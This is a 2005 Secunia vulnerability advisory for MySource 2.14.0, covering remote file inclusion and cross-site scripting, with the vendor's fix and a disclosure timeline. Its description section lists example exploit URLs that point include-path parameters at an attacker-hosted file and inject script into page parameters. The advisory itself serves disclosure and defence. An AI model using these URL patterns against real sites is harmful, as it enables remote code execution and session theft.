====================================================================== Secunia Research 18/10/2005 - MySource Cross-Site Scripting and File Inclusion Vulnerabilities - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerabilities.......................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 About Secunia........................................................8 Verification.........................................................9 ====================================================================== 1) Affected Software MySource 2.14.0 Prior versions may also be affected. ====================================================================== 2) Severity Rating: Highly critical Impact: Cross-site scripting and system access Where: Remote ====================================================================== 3) Vendor's Description of Software MySource is a powerful, open source website and intranet content publishing and management system. It is designed to enable technically unskilled users to build and maintain their own web solutions securely, professionally and inexpensively. Product link: http://mysource.squiz.net/ ====================================================================== 4) Description of Vulnerabilities Secunia Research has discovered some vulnerabilities in MySource, which can be exploited by malicious people to conduct cross-site scripting attacks and compromise a vulnerable system. 1) Some input isn't properly verified, before it used to include files. This can be exploited to include arbitrary files from external and local resources. Examples: http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php? INCLUDE_PATH=http://[host]/[file]? http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php? SQUIZLIB_PATH=http://[host]/[file]? http://[victim]/web/init_mysource.php? INCLUDE_PATH=http://[host]/[file]? http://[victim]/pear/Net_Socket/Socket.php? PEAR_PATH=http://[host]/[file]? http://[victim]/pear/HTTP_Request/Request.php? PEAR_PATH=http://[host]/[file]? http://[victim]/pear/Mail/Mail.php? PEAR_PATH=http://[host]/[file]? http://[victim]/pear/Date/Date.php? PEAR_PATH=http://[host]/[file]? http://[victim]/pear/Date/Date/Span.php? PEAR_PATH=http://[host]/[file]? http://[victim]/pear/Mail_Mime/mimeDecode.php? PEAR_PATH=http://[host]/[file]? http://[victim]/pear/Mail_Mime/mime.php? PEAR_PATH=http://[host]/[file]? Successful exploitation requires that "register_globals" is enabled and that the affected scripts are placed accessible inside the web root. 2) Some input isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Examples: http://[victim]/web/edit/upgrade_in_progress_backend.php? target_url=">[code] http://[victim]/squizlib/bodycopy/pop_ups/insert_table.php? bgcolor=[code] http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_props.php? bgcolor=[code] http://[victim]/squizlib/bodycopy/pop_ups/header.php? bgcolor=[code] http://[victim]/squizlib/bodycopy/pop_ups/edit_table_row_props.php? bgcolor=[code] http://[victim]/squizlib/bodycopy/pop_ups/edit_table_props.php? bgcolor=[code] http://[victim]/squizlib/bodycopy/pop_ups/ edit_table_cell_type_wysiwyg.php?stylesheet=">[code] Successful exploitation requires that "register_globals" is enabled and that the affected scripts are placed accessible inside the web root. The vulnerabilities have been confirmed in version 2.14.0. Prior versions may also be affected. ====================================================================== 5) Solution The vendor has fixed the vulnerabilities in version 2.14.2 by warning the user during the installation process about the security risks of placing MySource script files in a publicly available folder and having "register_globals" enabled. Users should set "register_globals" to "Off" and ensure that the MySource installation is moved out of the web root. Installation process updated in version 2.14.2: http://mysource.squiz.net/download/downloads/download_2.14.2 ====================================================================== 6) Time Table 30/09/2005 - Vulnerabilities discovered. 03/10/2005 - Vendor notified. 18/10/2005 - Vendor releases new version. 18/10/2005 - Public disclosure. ====================================================================== 7) Credits Discovered by Secunia Research. ====================================================================== 8) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ ====================================================================== 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2005-51/advisory/ ======================================================================